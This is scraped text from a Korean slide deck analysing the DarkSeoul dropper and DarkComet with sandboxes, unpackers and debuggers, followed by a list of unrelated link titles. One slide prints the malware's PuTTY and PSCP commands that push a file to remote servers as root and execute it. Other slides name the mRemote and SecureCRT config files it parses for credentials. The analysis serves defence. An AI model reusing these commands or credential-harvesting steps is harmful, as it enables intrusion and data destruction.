Strings Sysinternals Unpacking using unpacker upx d packed
- Slides: 53
초기분석 – Strings (Sysinternals)
Unpacking – using unpacker upx –d packed파일 –o목적파일
Unpacking – using unpacker Unpacked !
동적분석 – tool 소개 <Process Monitor> <Autoruns>
자동화 분석(Automated System) • cuckoo sandbox, CWsandbox • • http: //www. cuckoosandbox. org http: //mwanalysis. org
자동화 분석(Automated System) < CWSandbox의 기본 구조 >
자동화 분석 – Cuckoo sandbox
자동화 분석 - https: //malwr. com/ • cuckoo sandbox 기반 • Virus. Total library 이용
참고) APK 자동화 분석 < 안드로이드 apk 파일 분석 서비스 > • Stowaway • San. Droid • Mobile-Sandbox 23 • Copper. Droid • Com. Droid • Andro. Total <Windows binary, APK, 의심스러운 URL> • Anubix
동적분석 – Automated System
동적분석 – Automated System
동적분석 – Automated System
동적분석 – Automated System
동적분석 – Automated System
동적분석 – Automated System 4개의 Drop. File 존재
동적분석 – Automated System
동적분석 – Automated System • Dark. Seoul. Dropper API호출 흐름
동적분석 – Automated System • Dark. Seoul. Dropper API호출 흐름
동적분석 – Automated System • Dark. Seoul. Dropper API호출 흐름
동적분석 – Automated System • Agent. Base. exe API호출 흐름
동적분석 – Automated System • Pasvc. exe vs Clisvc. exe 구분 Pasvc. exe Clisvc. exe 제품 Ahnlab Policy Agent Vi. Robot ISMS 회사 Ahnlab, Inc. Hauri 설명 pa. Svc Service for VISMS Agent 디렉토리 %PROGRAMFILES%Ahn. LabAPC 2Policy Agent %PROGRAMFILES%HauriSi te. Client
동적분석 – Automated System • Agent. Base. exe API호출 흐름 Physical. Drive 0~9 까지 진행
동적분석 – Automated System • Agent. Base. exe API호출 흐름 SYNCHRONIZE | FILE_SHARE_READ SYNCHRONIZE | GERNERIC_WRITE | FILE_READ_ATTRIBUTES B: ~ Y: 까지 진행
동적분석 – Malwr. com의 한계 - Dark. Comet ? ? < dark. Seoul > < dark. Comet > Behavioral Analysis가 없다?
동적분석 – Malwr. com의 한계 - Dark. Comet
동적분석 – Malwr. com의 한계 - Dark. Comet
Debugging - Tool • User. Mode Debugging • IDA http: //www. ollydbg. de/ https: //www. hex-rays. com • Kernel. Mode Debugging Windbg http: //msdn. microsoft. com
Debugging - Dark. Seoul. Dropper • Dark. Seoul. Dropper의 Start. Up Code
Debugging - Dark. Seoul. Dropper • dropfiles “C: windowstemp~v 3. log” 가 없으면 Agent. Base. exe 실행
Debugging - Dark. Seoul. Dropper "c: Documents and settingsAdministratorLocal SettingsApplication DataFelix_Deimelm. Remoteconf. Cons. xml“ => m. Remote "c: Documents and settingsAdministratorApplication DataVan. DykeConfigSessions“ => Secure. CRT
Debugging - Dark. Seoul. Dropper - m. Remote 설치 O -> 4033 A 0 함수 호출 - Secure. CRT 설치 O -> 404370 함수 호출
Debugging – 4033 A 0 함수 Hostname, Descr, Panel, Port, Password 파싱
Debugging – 404370 함수 %TEMP%conime. exe -batch -P PORT -l root Password %Temp%~pr 1. tmp 서버 IP: /tmp/cups %TEMP%alg. exe -batch -P PORT -l root -pw Password Server. IP "chmod 755 /tmp/cups; /tmp/cups"
Dropfiles - ~pr 1. tmp
Dropfiles – conime. exe, alg. exe - Conime. exe : PSCP Console( Build 2006. 03. 13 23: 32: 43) - Alg. exe : Putty Console( Build 2013. 02. 14 23: 14: 13)
Dropfiles – Agent. Base. exe
. NET File Reversing - Dark. Comet ? ? ? ?
. NET File Reversing - Dark. Comet • Decompiler -. NET Reflector
. NET File Reversing - Dark. Comet • Decompiler -. NET Reflector
참고자료 - 강흥수 멘토님의 Bo. B 수업 - Ahnlab Clinic Center - [악성코드 탐지 -3] 에뮬레이터와 샌드박스 http: //acc. giro. or. kr/secu_view. asp? seq=9531&category=01 https: //malwr. com/ - Elf 구조 : http: //pobimoon-syspg. blogspot. kr/2012/03/mips. html - PE 구조 : http: //reversecore. com/18 -. NET Framework 오류 : http: //shallbox. tistory. com/43 - NSHC 3. 20 사이버테러 사고 분석 보고서 - 악성코드 분석방법론 ASEC 장영준 연구원 http: //www. slideshare. net/youngjunchang 14/slideshare-21143372 < 악성코드 출처 > http: //contagiodump. blogspot. kr <. Net 그림 출처> http: //dotnetclass. blogsome. com
Q&A
- Upx decompiler
- Unpacking competencies using 5ps
- Yueqian zhang
- Pbp unpacker
- Www.sysinternals.com
- Sysinternals poolmon
- Unpacking the teks
- Unpacking standards template
- Unpacking the teks
- Gif unpacking in census
- Community development
- Unpacking the prompt
- Career ready practices nj
- Unpacking the prompt
- What are the services delivered by a valet
- Unpacking common core standards
- Unpacking the teks
- Pointers and strings
- Declare a two dimensional array of strings named chessboard
- Array of structs c
- A type of cipher that uses multiple alphabetic strings.
- Three masses are connected by strings
- Image search reverse
- Combination or permutation
- Lflexion
- A decorated bamboo tube closed by a node at both ends
- Strings in assembly language
- Jmp add in for excel
- String in discrete mathematics
- Cld instruction in 8086
- Rate of energy transfer by sinusoidal waves on strings
- Ida pro strings
- Strings and other things
- Michael league gear
- Strings in java
- Uniform circular motion implies
- String c language
- Achievement standards network
- Compare strings in python
- Ida strings
- What are strings in c
- Rhyming strings
- Spring problems mechanics
- Ottawa suzuki strings
- Vortex strings
- Packed bed absorption tower
- Close packed direction
- Closely packed brick shaped cells with corners thickened
- Cytoplasm organelle
- Steep-sided volcano made of loosely packed tephra
- Its molecules are closely packed together.
- Packed cell volume
- Closely packed cells
- Furuc